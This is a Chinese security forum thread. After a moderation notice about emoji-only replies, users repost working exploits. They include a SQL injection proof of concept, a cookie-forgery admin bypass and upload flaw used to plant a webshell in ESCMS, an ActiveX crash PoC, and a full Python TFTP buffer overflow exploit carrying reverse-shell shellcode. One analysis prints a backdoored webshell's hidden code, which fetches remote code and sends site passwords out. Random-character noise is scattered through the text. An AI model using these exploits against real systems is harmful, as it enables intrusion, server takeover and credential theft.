最近看过此主题的会员

返回列表 发帖

灌水警告!!

可能因为近日论坛表情更新,所以部分论坛会员运用纯表情回复贴或一些无意义回复,这里予以灌水删帖处理!
. s7 r; S  N+ f0 s
, E% A  ]& |2 j6 U9 _纯表情回复是对帖子作者的作品不尊重。所以请各位尊重发帖人,下不为例~~~
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

收到
http://chenming5869.blog.163.com/
百分百付出的汗水,百分百走向成功

TOP

楼上木JJ

TOP

还有一些回复奇诡的也该打压下

TOP

回复 4# 笨蛋》活该
9 k9 S' W6 L$ t6 g% \. F2 D
) R9 w  W8 f2 J. j8 w' a9 E5 n0 Z) z" r& b& M7 ?+ o1 r5 ~
   是的 比如3楼

TOP

泪流满面

TOP

PHP Dashboards NEW 4.4 - SQL Injection
# # # # #
3 |9 Q( x8 b1 l6 Z& `# _: z# Exploit Title: PHP Dashboards NEW 4.4 - SQL Injection+ |9 U% @( c$ o
# Dork: N/A9 |' M7 w9 {+ [5 q8 f
# Date: 11.09.2017
, H) ^. e6 [9 V. g# Vendor Homepage: http://dataninja.biz/  x9 X7 K, R1 G0 D, R. d% ?8 T
# Software Link: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871
8 e" O- I0 I6 _; `" u+ B% `# Demo: http://phpdashboardv4.dataninja.biz/
7 a# I8 i& p0 \) q7 D# Version: 4.4
0 Q* c; [2 B& K# Category: Webapps) F* `( [, S( f3 @5 \! p
# Tested on: WiN7_x64/KaLiLinuX_x64
- K* Y2 m7 F! P* H  X4 \8 }# CVE: N/A4 Z6 d1 B- r6 `4 g
# # # # #$ }% f7 q" P8 P0 \3 C6 f! I
# Exploit Author: Ihsan Sencan
' B" [: X' Y0 A0 {# Author Web: http://ihsan.net' E  N1 F: L: E3 Q
# Author Social: @ihsansencan& x. }- r7 m5 e: t. f1 @' e+ r8 z2 U# q
# # # # #
% ]) V  V( v$ v0 j; b# Description:
7 B6 j9 N* J) H$ f# The vulnerability allows an attacker to inject sql commands....; v% L7 Z5 q8 n2 P! i
#
6 g+ B8 d: N, n$ o5 l/ y2 I( m# Proof of Concept:
( [( D: R; E# Y. x& W# 3 W$ U! Y2 \& i2 L2 q# p8 x6 k1 q' g
# http://localhost/[PATH]/php/share/save.php?dashID=[SQL]
9 y* v6 b# K4 z2 w# 1 d3 z# g1 P5 E1 j: K
# http://localhost/[PATH]/php/save/db.php?dashID=[SQL]# ?; _/ _2 T* b3 A; G/ U
8 u) X9 I# {6 ?, \/ u" y: d
# " V5 [3 j& p) ~1 L5 t+ h# q, n
# Etc..
& o+ e6 {9 M7 }/ s7 f# # # # #! i1 k. \2 {7 L# D1 I- w

1 t" f; @. {7 C' G; f! v
# P' h$ t1 I; H- s7 ^- p) _
3 N2 B5 R! E, a. D( b+ g$ {/ o0 @) S2 K

, v9 m" _" y* K; i
% S, e, L4 n2 K9 W7 x
% E4 s, P, M/ L% ~& T8 m
' c8 X9 ?; \; F+ t' m& O0 A+ Q5 `7 m

3 h! G3 F# x. |- j8 c; g& V# Z) c# T9 z  {, \& m2 i5 a
3 `1 a+ r  ]6 f/ H% b2 z9 @& k- k, N) m

$ H; x, x3 l5 z" O$ g8 K! G6 N2 U+ N1 ?7 y" C2 X

8 U2 k' z: x; k- p; M; ]0 F. B& e( _
  ^0 E6 K* q: P! l, N0 b. h

1 `% g8 g5 a( U/ F8 j9 j: i' F$ U公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

[转载]十三WEBSHELL终结版后men的发现之旅
[转载]十三WEBSHELL终结版后men的发现之旅
7 G( ^" _( ]; ]- B作者:TheLostMind来源:绝色笔记自从上次从网上找了个WebShell管理网站,后来发现有*, 被人挂马了,数据库被破坏了,至今还没修复……所以对别人的WebShell格外小心。网上找了个十三WEBSHELL终结版生成器,如图下面我们来生成一个ASP WebShell生成后的WebShell是加密的这个解密直接用工具了,就不详述,解密后代码如图132.JPG看看代码, 还是加密的从代码中很容易可以看到他的解密函数是SinfoEn那么我们就来解密出来,解密的代码已经有人写出来了。下面是冰点极限论坛上贴出来的解密代码:===============================decode.asp======================================<%Pos=2 '解密固定值Function Fun(ShiSanObjstr)ShiSanObjstr=Replace(ShiSanObjstr,"|","""")For ShiSanI=1 To Len(ShiSanObjstr)If Mid(ShiSanObjstr,ShiSanI,1)<>"!" ThenShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&amp;ShiSanNewStrElseShiSanNewStr=vbCrLf&amp;ShiSanNewStrEnd IfNextFun = ShiSanNewStrEnd FunctionFunction SinfoEn(ObjStr,ObjPos)ObjStr=Replace(ObjStr,"~","""")NewStr=Split(ObjStr,"`")For i=0 To UBound(NewStr)SinfoEn=SinfoEn&amp;EnCode(NewStr(i),ObjPos)&amp;vbCrLfNextSinfoEn=Left(SinfoEn,Len(SinfoEn)-2)End FunctionFunction EnCode(ObjStr,ObjPos)Dim NewStr,TmpStr,i,LenStrLenStr=Len(ObjStr)For i=0 To Int(LenStr/ObjPos)-1TmpStr=Mid(ObjStr,i*ObjPos+1,ObjPos)&amp;TmpStrNextEnCode=TmpStr&amp;Right(ObjStr,LenStr Mod ObjPos)End Functiondata=request.form("x")if data="" then data="nothing"response.write "<form method='post'>"response.write "<textarea name='x' cols='80' rows='30'>"response.write Server.HTMLEncode(SinfoEn(data,Pos))response.write "</textarea>"response.write "<input type='submit' name='Submit1' value=' 提交 '>"response.write "<input type='reset' name='Submit32' value=' 重置 '>"response.write "</form>"%>===============================end===========================================现在就直接解密,解密后的代码如133.jpg按照普通的搜索*的方法,当然是搜索如HTTP之类的代码,我搜索了一遍,没有发现可疑的代码。搜索关键子:UserPass看看它的密码验证代码:====================================================================================if session("web2a2dmin")<>UserPass thenif request.form("pass")<>"" thenif Serinf(request.form("pass"),pn)=UserPass thensession("web2a2dmin")=UserPassresponse.redirect urlelserrs"非法登录"end ifelsesi="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><a href='"&amp;SiteURL&amp;"' target='_blank'>"&amp;mname&amp;"</a><hr><form action='"&amp;url&amp;"' method='post'>密码:<input name='pass' type='password' size='22'> <input type='submit' value='登录'></form><hr>"&amp;Copyright&amp;"</div> </center>"RRS sIend ifresponse.end=======================================================================================密码用Serinf函数加密然后进行验证,代码正常,没有可疑的迹象我们在搜索Serinf,看到如下代码:========================================================================================if session("serinfo")=false thenSererInf "1ll4":session("serinfo")=trueelseif action="getTerminalInfo" thenSererInf "1ll4"end ifend if========================================================================================看到这里就觉得有点奇怪了,搜索session("serinfo"),可以发现session("serinfo") 在前面是没有定义的,那肯定是false了,那么我们就来看看SererInf()这个函数,搜索SererInf,找到如下代码:============================================================================================function SererInf(inf)on error resume nextSet theserver=Server.createobject(Sot(13,0))theserver.open "GET",right(sot(13,0),4)&amp;chr(60-pos)&amp;"/"&amp;chr(pos+45)&amp;inf&amp;chr(46)&amp;mid(sot(4,0),2,1)&amp;chr(109+pos)&amp;right(Sot(6,0),1)&amp;chr(47)&amp;right(sot(1,0),1),falsetheserver.send()if theserver.readystate<>4 thenexit functionend ifexecute(theserver.responseText)set theserver=nothingif err.number<>0 thenerr.Clearend ifend function======================================================================================看到这里就很明白了,这就是*,那么我们的*到底是怎么样的呢?还是把下面这句解密开来看看=======================================================================================right(sot(13,0),4)&amp;chr(60-pos)&amp;"/"&amp;chr(pos+45)&amp;inf&amp;chr(46)&amp;mid(sot(4,0),2,1)&amp;chr(109+pos)&amp;right(Sot(6,0),1)&amp;chr(47)&amp;right(sot(1,0),1)==========================================================================================继续搜索sot,发现sot数组的值如下:========================================================================================Sot(13,0) = "Microsoft.XMLHTTP"Sot(4,0) = "Scripting.Dictionary"Sot(6,0) = "Adodb.Stream"Sot(1,0) = "wscript.shell"===========================================================================================继续上查,可以看到pos=2,那么我们现在就可以把上面的这段用函数加密了的代码解密出来了,很简单。right(sot(13,0),4)=httpchr(60-pos)=:chr(pos+45)=/chr(46)=.mid(sot(4,0),2,1)=cchr(109+pos)=oright(Sot(6,0),1)=mchr(47)=/right(sot(1,0),1)=l隐藏得的确很巧妙!解密的代码如下:==========================================================================================http://1ll4.com/l=========================================================================================看到这里是不是觉得很奇怪?怎么*代码不完整呢?不急,我们再来打开http://1ll4.com/l这个网址看个究竟。打开http://1ll4.com/l页面,查看源文件,代码如下:==========================================================================================Serurl="http://1ll4.com/1/?jpg=8&amp;u="&amp;Serveru&amp;"&amp;p="&amp;UserPassSet theserver=Server.createobject(Sot(13,0))theserver.open "GET",Serurl,falsetheserver.send()=========================================================================================现在看到这里就完整了,参数Serveru=request.servervariables(""http_host"")&amp;url,即网站的完整路径,参数UserPass当然就是密码了,虽然是加密的,不过可以解密!到这里,WebShell里面的*就完全显露出来了,接下来的事情当然是去*!我这里修改了这个WebShell,除去了*,增加了部分功能,改善了部分功能,不知道放到哪里下载,大家可以到我的BLOG上看:http://hi.baidu.com/lostmind从代码中还可以看到,这个提交没有COOKIE验证,那么我们就可以直接提交代码了,可以直接找个HTTP破解器,把地址和参数写进去,然后DOS它一把!当然大家不要D它了,写个WebShell也不容易,原谅他吧!同时也提醒朋友们都留心,别人的东西还是仔细看看。
* f2 @: m2 {' u3 O6 J2 L$ S
: c$ x. R0 S% t. D0 J+ v+ ]9 w' m( v) g; b

1 N1 E, R& K& n1 c3 a6 F3 m4 U2 d) U8 x6 T7 ~6 t, e

7 J8 q- x) p% j) r! _0 U% M5 k. ~; M4 b) H! g) f: `1 O; `; i

7 ^9 W- O8 G, @  q$ ~2 c+ c9 ^1 q/ ~2 ?7 d' u/ e3 o' q

' I4 e8 A$ [# l! A  w0 p3 N  z$ o2 F, a" G

/ w' M- C* a6 E- }& o  V8 G: J8 X# B! h% s: _6 T% Z

+ P) j9 E' D: N6 D% }# `- }7 A$ Y. g+ c+ K6 \

! U: ~  M9 i/ j; h5 p4 x8 t* G1 G2 }) p) V! `

* ]" n4 ~2 [, Z- E5 m
+ |) ]- Q& G, S0 N$ G公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ESCMS cookies欺骗0day
版本:ESCMS V1.0 SP1 Build 1125
9 e; H, {" n* I! m8 m$ T7 @后台登陆验证是通过admin/check.asp实现的,看代码

0 q5 r# o; c( B2 }
5 q# @+ R: B" q# U& E  l/ o$ `
<%% N7 `& S4 @6 M" z# ^
if Request.cookies(CookiesKey)("ES_admin")="" then
8 ~  P: H9 [2 r) P3 r'注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空
( O" J: n+ R9 J0 j. X'CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2
6 m$ L% W# K- G2 s0 K1 cCall Err_Show()3 R) c7 R6 ~; t. E; B/ H3 z. |
Response.End()
% p6 ?' @) F& ?* C4 LEnd if
7 a. E5 Y/ P9 i9 g" Q3 g, s......
4 w5 s5 M6 ~' ^%>
0 n+ n; ^. H0 q, H3 D首先我们打开http://sitedir.com.cn/admin/es_index.html

4 ?" T( a8 f. m2 w6 O0 C7 ?3 V' P8 Q
4 @( \# N- C) z

. E$ Z" r/ h5 f' S3 s6 I
然后在COOKIE结尾加上  L/ \0 i: X2 b9 h( x7 k4 V# ~1 f
; ESCMS$_SP2=ES_admin=st0p;
) `+ a! W: v4 N3 h7 t
修改,然后刷新

8 E9 h* L/ Q$ }7 R+ o
进后台了嘎..
% y2 ^; L7 t7 @
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL,看代码

, B+ o8 T% v1 C8 Q
......
! F* \9 o8 r6 {formPath=upload.form("filepath") '此处没有过滤. m! H2 N2 _- m4 j
if formPath="" then/ h7 H- T1 i+ F6 u+ `/ x/ D
formPath="../Upfile") k8 P8 n; K1 L6 w3 ^7 f. p3 w
end if
/ _6 F3 a5 j+ e6 q# QDim formPath14 [- K  T! B* |7 v) N5 O
formPath1="Upfile/"
6 J! ^3 `3 ^% n'在目录后加(/)
) ?' p3 _/ `* ~* wif right(formPath,1)<>"/" then " x; z5 e: U: A+ }, z. _/ ^
formPath=formPath&amp;"/"
- u# k4 k! M: L5 v# Tend if ) B4 {4 w; l1 L& I: v' ]# ?* ^* a
for each formName in upload.file '列出所有上传了的文件
/ R1 }  V2 i% C; D1 Y  Iset file=upload.file(formName) '生成一个文件对象
/ ~. R) q8 A( J, c0 [if file.filesize<100 then
. R- f* R0 c  v2 H1 Rresponse.write "请先选择你要上传的图片! [ <a href=# onclick=history.go(-1)>请重新上传</a> ]"" B3 W% H% d, T0 d. }2 Z
response.end( s2 _6 r% A; k! U
end if

  q. h0 P6 L7 @
fileExt=lcase(file.FileExt)' M# G/ P3 N  X2 O, u7 u; A
if CheckFileExt(fileEXT)=false then" J3 l' ~6 }6 ?/ @6 ?4 ^! {4 a5 e
response.write "文件格式不正确! [ <a href=# onclick=history.go(-1)>请重新上传</a> ]"
) S# n1 z; C! }5 Iresponse.end
/ d. {; a! v, i% q% iend if

' h- Z  G  q5 Q; E8 c' q) _6 @
'randomize
6 A% N2 M  M3 V9 h- y# C9 qranNum=int(90000*rnd)+10000
. ^( F7 k0 a7 H/ b* i4 hDim tempname,temppath
3 O( O& y0 P" Y, Ftempname=year(now)&amp;month(now)&amp;day(now)&amp;hour(now)&amp;minute(now)&amp;second(now)&amp;ranNum&amp;"."&amp;fileExt* ]2 n0 N0 b/ X7 E2 t
temppath=formPath1&amp;tempname0 l7 U- k0 R$ z, c4 {! H, O
filename=formPath&amp;tempname
' }" g, T: h" mif file.FileSize>0 then '如果 FileSize > 0 说明有文件数据, \* ~+ O: U: K) m/ N
result=file.SaveToFile(Server.mappath(filename)) '保存文件,这里地址就会变成我们截断的SHELL名称
- Q  K8 h  W" M+ n/ z/ m......
; ^, d% f6 _! ^* W6 S# }4 Y3 p) K
8 \6 f+ v2 m0 t3 b/ _6 Q! d
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.

/ a; F) i; F9 S/ P# l- e- B
成功了,shell地址为http://www.sitedir.com.cn/admin/diy.asp) F6 B0 W' \. {# d# C9 p4 {
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..

+ l- A" f5 U) v& _# Z
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了,因为此版本用session来验证登陆…

; T! ?' r  E2 R' e5 q
2 s1 D% o% @% Q
3 t& x# t8 q! |% [0 y* |
3 G6 r: A% R% T0 e: T7 ~5 p
0 e* j4 [$ G! I

* i% t$ g/ J: G1 S. ?+ @" S, O4 D# G0 W# `, i
$ N, E1 L6 T' u+ m* ^# \) b

) J9 `. r/ `1 A: g" C% A% a$ H  Z. c. n6 N) l* f: s

* w! F3 G% S) \/ H$ ~0 L7 o
6 {% f8 u, O7 t' {7 X; u, C* W" F& K4 q( v" R# x

, {0 p2 b' a7 K+ Z
7 Z3 Z' b: k( }
9 F" U2 k; K4 o* _; k0 D6 ?! o; j; H! s1 D' B0 o
  s  @% |$ s& N# b

- J. Q7 M' Q6 ]6 Q: T7 g: X- B9 E  J( F

8 \* j, Y# x+ a; o, X5 d公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

PDF Viewer Component ActiveX DoS
Title : PDF Viewer Component ActiveX DoS6 Y: G. O4 y3 m
Auther : Senator of Pirates0 T+ j( y" L! s9 O) M, v- V! K
E-Mail : Senator.of.Pirates.team@gmail.com+ \' A4 t0 w4 ^4 x
FaceBook : FaceBook.Com/SenatorofPirates
; J' X4 d  e! [3 PSoftware link : http://www.ocxt.com/download/PDFViewerSetup.exe
: `% `. w) ^% X, |; ZDate : 05/02/2012% `+ G; b; i0 Q" V. o0 X/ Y% p, Q
Tested : Windows Xp SP3 EN5 h1 _8 F# v& G+ s9 E
eax=00000000 ebx=00000001 ecx=01800990 edx=01800990 esi=10150cd0 edi=000c5f6c9 g  u* v' f7 a3 \7 W+ j
eip=017a7a3e esp=0013c754 ebp=0013c758 iopl=0         nv up ei ng nz na po nc
( O$ }9 y& J. S$ D) J" }cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=002102823 V  n2 {0 X+ i+ s! j
017a7a3e c60000          mov     byte ptr [eax],0           ds:0023:00000000=??- ?7 ]0 w& u! T/ r  C
0:000> d eax
( ^9 b, o; _" R, Q8 R00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
' ^9 F9 t+ W& p9 {) g6 X1 I00000010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+ E- c1 C, _  @00000020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????9 @. o: `0 |2 u
00000030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
* A  y' U9 ^* ?9 f3 Y- Y00000040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????6 W4 {' J2 g' }7 u  M) A
00000050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????! D& Z6 x" o2 j, G2 Q% i
00000060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????  [: y. m! c+ C3 l( G9 t: {$ E1 \
00000070  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????3 G6 n0 F* d3 a, d9 X
0:000> d ebx0 u  F7 D% r2 H& _& K
00000001  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
' e$ _1 J& ~" @# h4 x! F! o00000011  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????6 n7 y6 R  h5 U! g. L: X" F+ ?
00000021  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????# P( Q, N6 {4 H. E
00000031  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
4 B0 b% b3 J; |/ t; d3 p4 @  `' d00000041  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????# {% k; M6 n! Q* ?6 h
00000051  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
4 n' @1 c5 ?: A- ]00000061  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????! D8 B- n  s8 ~
00000071  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
5 V  o& T! t3 ~( U; Z<object classid='clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04' id='target' />
- G* i1 i5 N: E( {7 F+ r, [<script language='vbscript'>
: Q2 _3 l$ q8 N, a; \! |targetFile = "C:Program FilesPDFViewerpdfviewer.ocx". V) U4 L4 b, e
prototype  = "Invoke_Unknown TitlebarText As String"
5 s. S' r' y3 s( f- H+ T" KmemberName = "TitlebarText"
- e, C  G, p! l: Q( L" l: C" g. O" Pprogid     = "PDFViewerLib.PDFViewer"
. y) w0 S, o7 W: C( O% }& r! vargCount   = 1
: l; k2 H: @: }3 K% T/ M7 }arg1=String(2068, "A")* x! h% z( t3 N5 \6 @
target.TitlebarText = arg1
4 ?" N" ^# U0 u# o+ R  Z</script>                    
- W+ T  `9 E# x, c
/ b/ g6 ~" |. d% @2 k$ N0 `- d) ]6 |2 k; z+ B+ @1 \
! {' |- h+ L6 ?; u: f6 \5 G& E

3 T; J1 m1 I4 ?4 U% z! L2 ]# p# z6 Y3 E

1 B  U) n: U0 ~+ t; @# y3 z" Z
+ z  Q: Q4 I6 n& x
! s5 G) L# L# K( F7 _7 M* l# s
3 V8 ?% K% ^% I9 S/ n- V1 {/ h( ~* P2 N1 l

' f: z% i, W0 l
1 a3 ~9 g& _5 Y% @! {: g+ \0 ?: S( ?  _( s& K
; u! B2 [; V* l, T7 ~6 l
8 |7 V* z2 m0 [; Q' n
# S  O. T9 b6 m
: i2 t! c' G# I! {) p0 [5 H/ ~

8 J" a7 q0 Q$ _! V9 f3 z
/ [0 n# Z/ q0 A4 c6 j# q# ^, ]6 r1 U
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

TFTP SERVER V1.4 ST (RRQ Overflow)
#---------------------------------------------------------------------------#
$ x  X5 K7 ?7 x+ z# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow)                               #
, W( P5 N; r4 D7 D! J# OS: Windows XP PRO SP3                                                    #
; X" _7 h9 E) P+ V+ [: q! k# Author: b33f                                                              #
- E2 i" Z2 x4 t- F2 k( v6 C3 ?#---------------------------------------------------------------------------#
$ `8 g( e* W' \' _2 y. ~  }# Smashing the stack for fun and practise...                                #8 z1 x( t& R6 w" U$ y
#                                                                           #; R. Y; v$ |2 e% M( m
# This tftp service have been pwned extensively:                            #
- E2 V4 F6 X- c' I5 C: i# (1) Muts ==> WRQ Overflow                                                 #
4 G: s6 q4 H" |#     http://www.exploit-db.com/exploits/5314/                              #0 X! ~. ^! `; [$ G) N
# (2) Molotov ==> WRQ Overflow                                              #
; n/ ]% x! K" Y9 F) Z8 e#     http://www.exploit-db.com/exploits/10542/                             #6 b+ M4 q5 B  f0 @8 {5 ~
# (3) tixxDZ ==> ERROR Overflow                                             #
2 |1 v4 P7 D7 \# u#     http://www.exploit-db.com/exploits/5563/                              #
5 h. o5 x" h/ S+ V7 z/ r$ l#                                                                           #" B6 K, k: J  I; @
# Vulnerable software:                                                      #; u. ?8 M6 y0 k9 b, o; u
# http://www.exploit-db.com/application/5314/                               #
  o, B: P$ u& T$ G, F; U2 G+ M#---------------------------------------------------------------------------#5 b, K! }: {; o- N
# After some simple fuzzing with spike I discovered that sending a Read     #4 O7 F1 W5 E% b
# Request (RRQ) packet can also trigger a buffer overflow...                #
  F% C0 d" J5 {# i1 R  V+ v# j9 \: T#---------------------------------------------------------------------------#( J) `+ ^3 c. P3 r- T- c6 Z
# It might take up to 30 seconds for some reason but the shell does appear  #" w' d; O# p& W5 Z/ j1 I
# as expected....                                                           #
5 K$ W1 k8 x6 o) O0 _! G#                                                                           #
6 _& i8 t4 Z; P$ u  B2 M" H. Y# root@bt:~# nc -lvp 9988                                                   #& Z2 L$ z+ L; {8 z. \
# listening on [any] 9988 ...                                               #" z3 w# k9 W/ @+ W
# 192.168.111.128: inverse host lookup failed: Unknown server error         #: }; k1 W( G- Y; U- L* n4 {
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072        #) H( P* z; Q, q) I9 z! ?
# Microsoft Windows XP [Version 5.1.2600]                                   #9 ~4 ~8 l7 l4 q/ c0 c/ E6 h7 }. A
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
1 x  X* x9 O! O- x5 K  r. m#                                                                           #
; D; ^0 {  I2 Z- l0 \1 e$ y# C:Program FilesTFTPServer>                                              #
: K6 i& H/ E+ s5 `/ v; _#---------------------------------------------------------------------------#8 p5 M. ~/ e$ s! J# y% Q0 c
1 S- a- a2 a5 X" o5 w
import socket$ a( P3 y6 C! m2 J0 d, G9 m) S
import sys
% o# U% Q5 u+ r * N1 K# N- G5 T5 R
host = '192.168.111.128'
9 |' k& o* l7 @port = 69" T" `3 k+ H" D& T3 {
5 _( X4 K' `; n+ E; h
try:  y& q) d0 Q/ ]' d6 n  b
      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
4 m* U) M& e- c, J! R+ a       - O" @4 b5 W7 Y% B( i
except:
, G  s2 f. ?# z9 ]: g* \      print "socket() failed". B% O$ H! a8 L) F1 f
      sys.exit(1)
* X; ]- a9 Q! C# m
. R( R2 L2 z9 M) [: |, N#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00'
+ p' G: r2 f' {' b#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
- ]3 D: j) j9 O6 K  ishell = (
  O  S" x6 s6 j1 u"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
5 O# C1 ^) @! W/ E# D* f; w"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97", x/ A; d" g, ?" u, d
"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"* ~+ q# d4 |' I8 A
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
( z4 j6 V* }1 G/ }- ]"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"
; R: H$ B; Y1 o( Y. E"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"
$ k, E7 y. h. O# b"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
2 L" B* e5 L4 x% Q"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
7 v* x7 i1 v$ r; G2 d"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"$ f0 [; W! o! o: O& o$ O/ S
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff") I4 A% H) U. P0 E
"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
' C2 Q! |8 x- P# {4 r1 k; A8 F5 b"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"$ c! z, Q+ S" U* c, S$ L3 z& A
"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0") r# L* c7 r0 W0 N& P2 e/ `
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
, g- h7 L8 z: K! x: N"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"$ t: \9 c# @- |  X+ {" T4 @
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
* Z  f0 S, X$ L2 B% N( ?"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c") x  q6 V" ]- ~( {; c8 E  A4 H
"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"
9 L9 v' o" F- \$ E/ Y"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"9 n" O+ H, v# a. O2 A4 F. [
"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"3 V! t2 D* c- E9 Z; {# p& N+ P6 h
"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f"+ R2 Z: N5 }% \
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"
- O& G. S( g9 H' V1 n"xafx96x42xdfxddx87x26xdfx72xa7x62")0 u( o" S2 u, B1 A+ I9 \
! A9 a! c1 ?/ q- {% C0 z6 O) _
#---------------------------------------------------------------------------#2 {2 R( z  e# a( M; N- a6 J
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR                               #
- G( X3 |" i2 B8 _* x#             => 3-byte overwrite using the mandatory protocol null-byte.   #' V8 I  g: t  g: I: A5 d
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump.  #! |( A: @3 s7 G" F
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer.          #
- x3 L8 \7 ?6 |1 \, I# (4) Stage4: reverse shell port 9988 - size 341                            #! D2 f% @  u9 w  B" q  ?
#---------------------------------------------------------------------------#7 D8 l& K/ j" s# w; g, O9 x
1 P: j& e- a& f* _
stage4 = "x90"*50 + shell
: k* C# W1 o3 j. hstage3 = "xE9x2ExFAxFFxFF"
; A8 D: T3 w" d: c1 n# E4 dstage2 = "xEBxF9x90x90"* X" D$ }7 Z0 B* y6 k
stage1 = "x05x96x40"+ O1 x& g" E. g3 k* Z( b. @

/ x  ?# `& l+ g/ d) w& O4 Zfilename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
+ k6 V& y3 o7 D* H- C
* g+ D* V( S4 [: h% ?0 ? + `* w3 H/ x8 O0 |
mode = "netascii"
& M( |/ z; Z$ e) nyoulose = "x00x01" + filename + "x00" + mode + "x00"
) u1 u. a5 J. x6 ]2 \5 i% Vs.sendto(youlose, (host, port))
- j  b0 y- a) H. \  M* ^+ |- B2 M/ E# C- J2 L  a, u
/ W7 _& w$ L8 B; y8 `2 C- f. [
3 \/ W* ~* U8 d( V+ P
' N& [! Z/ a* Y: n3 ~& Q

! e; e2 d3 x+ G/ e7 G" q7 x% u9 w" _/ w# o3 M, _& {

# m& ^1 r1 p5 G5 s0 a4 ~4 P2 ]& C8 L7 ~. a
2 l# x8 m, r3 m8 [% A% x. k, i- t

8 X, n7 I. C  h& n  e8 V
* f4 H6 M9 c+ M9 N, o% P8 O% J. R8 D" x( k5 t: o# m1 n- c

: G: B) H/ \3 b1 D2 J- T& L, _" f

. T$ C, N5 J6 H; P: d  }+ j$ h3 n% [6 V9 b7 [
$ Z3 V9 P  s3 T( \0 G1 Y! n
: `# ~# O5 h' \  e
